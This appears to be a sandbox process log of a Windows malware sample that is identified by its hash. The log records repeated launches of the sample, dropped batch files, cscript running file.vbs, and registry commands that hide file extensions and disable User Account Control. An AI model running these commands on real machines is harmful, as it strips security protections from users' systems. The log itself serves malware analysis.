C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SQIMokkw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\scIMsYEU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GwwsEAcA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qEwIokgs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tiMwgocs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NOAMIwIw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IawsUQUo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XikocAEU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EQcIgoAA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CCcowYMg.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QEEwQcEk.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aWQAwQcs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zsAIgsMY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vKgEYcos.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tKQEUcUI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kUYgssgM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fcUkAQwE.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xscgEIwE.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TGgskcUo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

